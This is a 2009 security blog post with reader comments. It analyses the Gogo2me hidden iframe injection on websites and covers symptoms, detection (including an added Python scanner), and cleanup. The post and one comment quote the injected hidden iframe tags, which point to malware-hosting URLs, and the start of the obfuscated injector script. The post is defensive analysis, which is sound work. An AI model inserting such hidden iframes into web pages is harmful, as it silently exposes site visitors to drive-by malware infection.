
Gogo2me – Hidden IFrame Injection.

   14 Jan 09   Filed in Website exploits

New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.

Symptoms

  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying you that your site is a reported attack site and that some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/

Detection

Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site. In the browser’s menu choose “view source” and search for the following code:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

It is usually located right after the <body> tag or after the closing </html> tag.

If found, this hidden IFrame is followed by a long obfuscated script that does all the bad things. This script starts with a code that looks like this:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){...

The actual content of this script varies from site to site, but it always starts with a function whose long name is made of random letters and digits.
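As an added illustration (not part of the original post or of Unmask Parasites), here is a small Python scanner that applies the two detection rules above to saved HTML files: it flags iframes that are hidden (either `visibility:hidden` or a 1×1 box) and script functions whose names look like the random letter-and-digit strings described. The sample page it scans is constructed; the hostnames in it are placeholders.

```python
import re
import sys

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
SRC_ATTR = re.compile(r"src=['\"]?([^'\" >]+)", re.I)
# Function names of 20+ characters; the digit count is checked separately.
FUNC_NAME = re.compile(r"function\s+([A-Za-z_$][A-Za-z0-9_$]{19,})\s*\(")

def iframe_is_hidden(tag):
    """True if the iframe is styled invisible or drawn as a 1x1 point."""
    attrs = re.sub(r"\s+", "", tag.lower())
    if "visibility:hidden" in attrs:
        return True
    w = re.search(r"width=['\"]?(\d+)", attrs)
    h = re.search(r"height=['\"]?(\d+)", attrs)
    return bool(w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1)

def scan_html(html):
    """Return (kind, detail) findings for hidden iframes and obfuscated scripts."""
    findings = []
    for m in IFRAME_TAG.finditer(html):
        if iframe_is_hidden(m.group(0)):
            src = SRC_ATTR.search(m.group(0))
            findings.append(("hidden_iframe", src.group(1) if src else ""))
    for m in FUNC_NAME.finditer(html):
        name = m.group(1)
        # Legitimate minified names are short; injected ones mix many digits in.
        if sum(ch.isdigit() for ch in name) >= 5:
            findings.append(("obfuscated_script", name))
    return findings

# Constructed sample: the first iframe and the function name are the ones the
# post quotes; the widget iframe is a legitimate, visible one and must not fire.
SAMPLE_PAGE = """<html><body>
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){return 1;}</script>
<iframe src="https://widget.example/embed" width="300" height="200"></iframe>
<iframe name=c10 src='http://malicious.example/.xx/xxxxx.html'
width=461 height=215 style='visibility:hidden'></iframe>
</body></html>"""

if __name__ == "__main__":
    # Usage: python scan.py page1.html page2.html ... (no args scans the sample)
    files = sys.argv[1:]
    pages = [(f, open(f, encoding="utf-8", errors="replace").read()) for f in files]
    for name, html in pages or [("SAMPLE_PAGE", SAMPLE_PAGE)]:
        for kind, detail in scan_html(html):
            print(f"{name}: {kind}: {detail}")
```

Run it with JavaScript-free tooling like this rather than opening the page in a browser, so nothing the page references is ever loaded.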

[Screenshot: Hidden IFrame in Unmask Parasites]

The easier and safer way to detect this exploit is to check suspected web pages with Unmask Parasites.

The hidden iframe is easily detected and reported in the External References section. The distinctive feature of this particular exploit is its strange iframe source: “http://url/”

I don’t know why hackers injected this IFrame that doesn’t load anything. Maybe it was a script kiddie who forgot to replace the placeholder with a real URL. Or maybe this harmless iframe was injected just to check if the files are really writable and then they injected really malicious code. Who knows.

How does this exploit work?

IFrames

An IFrame is a third-party page inserted into your own web page. There are many entirely legitimate uses of iframes (e.g. widgets, previews, etc.), but hackers also like iframes because they can make unsuspecting web surfers load malicious web pages while browsing legitimate websites.

To hide the fact that a web page contains unwanted iframes, hackers make their iframes invisible. For example, in this exploit the first iframe is created with a width and height of 1 pixel – visually it’s just a point. In addition they specify a style that makes it invisible: style='visibility: hidden;'

Obfuscated script

While hidden IFrames are invisible to web surfers, they can be easily detected in the HTML code. To hide iframes in the HTML, hackers inject obfuscated scripts that create the iframes on the fly when someone loads the web page. When you check the HTML code of such web pages you don’t see any iframes, just some JavaScript of unclear purpose with no URLs or suspicious words in it. And since many modern web pages contain dozens of third-party scripts (e.g. ads, statistics, widgets, etc.), webmasters usually overlook such scripts.

To hide malicious code, hackers encode their scripts multiple times, so that even if you execute such a script you’ll get just another obfuscated script.

In this exploit, the malicious script decodes itself and creates another encoded script, which in turn creates the following hidden (note the style) iframe (I slightly changed the iframe source):

<iframe name=c10 src='http://gogo2me .net/.xx/xxxxx.html'
width=461 height=215 style='visibility:hidden'></iframe>

Here we can see the Gogo2me site that Google reported to us. So where is the other “94 .247 .2 .0/” site?

I loaded the page from Gogo2me site and it contained another hidden iframe (I slightly changed the script name again):

<iframe style="position: absolute; top: 10; left: 124; width: 546px;
height: 524px; visibility: hidden" frameborder="0" scrolling="no"
src="http://94 .247 .2 .157/.xxx/xx.php?sid=1"></iframe>

Yes. This is that “94 .247 .2 .0/” site. Google always replaces the last number in IP addresses with 0 in its security reports.

So what is so malicious in this iframe?

This last IFrame loads a small (about 7 Kbytes) binary file (a gzipped script) that exploits Windows and browser vulnerabilities to infect your site visitors’ computers.

I sent this file to VirusTotal, and it was detected as a virus by only 2 (Sophos and Microsoft) out of 39 antivirus tools. So even the most up-to-date antivirus software won’t prevent the infection. Every site visitor is potentially in danger.

This is why Google blacklists your site if it finds hidden links to malware.

How to clean up?

I don’t have information about how this malicious code is being injected into web pages, so I can only provide some general common-sense advice.

  1. Locate and remove the malicious code (the iframe and the script) from your server files (or upload a fresh copy from a backup).
  2. Write-protect files (644 permissions on *nix).
  3. Check your local computer for viruses and spyware.
  4. Change all site-related passwords (FTP, control panel, etc.).
  5. You might also want to contact your hosting provider to investigate the issue.
  6. When you believe your site is clean, request a review via Google’s Webmaster Tools.

If you have any questions, comments or can share any additional information about this exploit, please leave your messages in the comment section below.


Reader's Comments (29)

  1. |

    Hi there

    I’m the webmaster of this website, and this error keeps happening. I’ve done everything suggested above, and it still happens. I send a “clean” version of the website, and within 3 hours the malicious code re-appears. I’m at my wits’ end now, I have no idea why this is happening, and am getting concerned as the business the website is for gets most of its customers through the website, and because of the Google message regarding it being unsafe I’ve had to take the main part of it down.

    If there’s anything you can suggest to help I would be more than grateful!

    Cheers

    Haydn Gleed

  2. |

    I too have done all the procedures given and contacted my hosting people. They too are not able to help me. Please try and suggest some permanent solution.

    • |

      It looks like you are using Dreamweaver for your site. Are you storing the FTP password in it? There is a theory that some trojans can steal FTP passwords stored in Dreamweaver. I don’t have any proof though.

  3. |

    I have found the solution (I hope so)… What you need to do is firstly block the
    IP: 77.221.133.188
    You need to give your files 644 privilege, and folders 755 privilege..
    and then send a message to Google to rectify the warning.

    • |

      Why this IP? Do you have any evidence? Logs?

      I’m really interested in any information about this issue.

      • |

        I happened to find this IP’s details and found that this IP is from Europe. Firstly I don’t have any visitors from Europe; second point is that after this IP the visitor is not showing any browser details; lastly, after this IP visitor my site was affected again.. But ya, blocking the IP is not the final solution… Even though I have blocked the IP my site has been affected again.. If anybody has any suggestion please help me out…

  4. |

    @Rakesh::

    Why do you say block that IP? Aren’t there hackers from IPs all over the universe? Don’t they do things like spoof their IP numbers and such? Or use proxies? And we have done all the recommended steps but these hackers do it anyway and I have no idea how. Except it is the crappiest hosting service we could have chosen and they won’t refund our money.

    Meanwhile is Anyone using servage.net for hosting? If you are, 99% chance the iframe injection has happened to you and you don’t even know it — they are the worst and they hate their customers because they will not do anything to help fix or secure their servers or help customers nor even admit they have a problem.

    They blame their customers and offer no help to customise your security settings to prevent hackers — who return within hours to re-hack and reinject the malicious code injections.

    Beware as the site warns. We discovered it too late.

    • |

      @PetLove: do you still have a site on that hosting? I’d like to take a look at it and other sites on the same server (I need the IP address of the server.)

      While your hoster may not be very friendly and helpful, I don’t think it’s a hosting-specific problem. I’ve seen this problem on many other hosts too.

      Could you contact me if the problem persists? I need more information about file permissions, server scripts, FTP client, etc.

      • |

        Can you help me out with a solution for this problem? I have given 644 privilege for files and 755 privilege for folders, but again the injection has happened.

    • |

      You are right. Although I have blocked the IP my site has been injected with iframes again.. If you have any solution for the same please help me out..

  5. |

    We’ve been battling this one and other variations here at work for a while now.

    We are 99.99% sure the root cause is FTP credentials being harvested on local machines via some unrecognized malware and being fed over to lists used by the ‘bad guys’. The bad guys then turn their scripts loose on these FTP accounts; they cruise through the site injecting the mentioned code into any file matching the criteria.

    Our theory sync’d up well with the analysis here http://www.abuse.ch/?p=737

    The quick fix is to remove the code from your pages, and *delete* your ftp accounts.

    The long fix is to probably reinstall Windows unless you can find a product that can identify and remove this particular malware, which as of yet we haven’t got a name for.

    No amount of changing passwords or file permissions will amount to much as they are getting in as *you* to your own ftp accounts.

    Finally, this ‘FTP injection’ is also distributed – we’ve seen hundreds of IPs, making it impossible to block effectively.

    Good luck.

  6. |

    I would like to find information on how this malicious script into the site and where it hides.
    It would be good to know.

  7. |

    I don’t believe that this is always done through a compromised FTP login. This type of hack has now transformed into something very nasty. It actually has the ability to change the domain’s directory permissions to 777.

    • |

      I also have some doubts, but it’s the best explanation I have when I see purely static HTML websites exploited. There is no way to inject SQL commands or some nasty script. And yes, using FTP, intruders can change file/directory permissions.

      Do you have evidence that this exploit changes directory permissions to 777?

  8. |

    Do any of you have an update? We’ve been experiencing this problem also – except that there is no evidence in the event log, or IIS logs, or FTP logs. Do any of you have log files showing this exploit? I personally do not believe that it is FTP.

    • |

      I don’t have access to compromised systems so I can only tell about things I can see from outside.

      Compromised sites I’ve seen are very different – static and dynamic. Various web servers: Apache, IIS. FTP is the most viable way to compromise such different sites.

      Anyway, if you have all internal logs you should be able to detect the changes in files. Let me know if you find the answer.

  9. |

    That’s what I’m saying … I do have all the log files and they show nil. I have turned logging up to the maximum detail.

  10. |

    Hi all, my website was under attack too. I don’t have JavaScript or programming knowledge, please help me out. Many thanks.

    • |

      James, I checked your site and found the Gogo2me obfuscated iframe there so I removed the link to your site from your comment (so that other visitors don’t get infected if they click on your link).

      You don’t actually need any programming skills. Just replace the server files with a clean copy. Make sure your own computer is not infected by spyware. Then change all passwords. Don’t store your passwords inside programs that upload files to the server. And consider contacting your hosting provider.

  11. |

    Thanks for the post and the comments. But I have a question:

    “Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site”.

    Do you possibly know, precisely which browsers are vulnerable? Should I simply avoid using Internet Explorer? Is browsing using a Firefox 3 with JavaScript enabled safe? I would rather not disable JS completely, but if it is necessary, I will.

    Also, say I found and downloaded some antivirus software which correctly detects the malware that the injected IFRAME elements download (http://www.virustotal.com/analisis/3dfacd15cfe5b67d14a3d03b8ac27a32). If I scan the computer with them, am I 100% safe? Maybe that binary executable is just assistant software, which then downloads the virus itself?…

    I am afraid that these are rhetorical questions, at least for now, but possible answers will be appreciated. :)

    • |

      The advice about disabling JavaScript was made only to detect the malicious script on a web page. It’s only for webmasters who want to find what’s wrong on their site. No advice here is intended for regular web surfers.

      Every browser is vulnerable. Get yourself a decent antivirus and firewall. Update your browser and OS regularly. Move to a Mac or Linux to minimize security threats. If you are using Firefox – consider the NoScript plugin.

      No antivirus is perfect. You can get the antivirus that detects that particular malware, but what about thousands of other viruses and spyware?

  12. |

    Hey All,

    I too have had my site compromised with the iframe attack.

    System: Mac OSX 10.5.6
    Host: BlueHost.com
    Installs: WP, Drupal and MT
    Date of Compromise: 040709

    The malicious code looked like this:

    iframe src="http:// cheapslotplay .cn/ in.cgi ? income47" width=1 height=1 style="visibility: hidden">

    and

    I first learned of the compromise when a twitter follower notified me of a malware alert when he came to my site.

    I poked around and discovered the multitude of appended to end of my source code.

    A quick (grep -r "<iframe" .) in the console informed me that hundreds of pages had been hacked (index, home, main, default).

    Long story short, I found a script that will go in and clean up your site. It was $10 and well worth it. You don’t have to know any code, so James, you’re in luck.

    The code is only set up for “goooogleadsence . biz” so if your attack is from a different site you have to change the name. The easiest thing to do is find and replace that URL with your pest URL, save, run and repeat the process for other URLs. In my case I had 3 different ones.

    I got the code here: http://www.yourjoomlapro.com/

    So far so good… I’ve changed my passwords and permissions so we’ll see if they strike again.

    Hope this helps.

    • |

      Usually the easiest (and free) way to remove injected stuff is to re-upload clean content from a backup.

      Anyway, the most important step is to prevent reinfection.

  13. |

    I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. You all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  14. |

    My site received the same attack recently…
    I believe the FileZilla FTP credentials were being used by some virus…
    Changed passwords to my FTP accounts, set file/directory permissions to 644/755, cleaned up my Windows system.. and since then have moved to Ubuntu… didn’t see the attack again in the last two weeks.

  15. |

    [...] they aware of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]

  16. |

    [...] http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/ [...]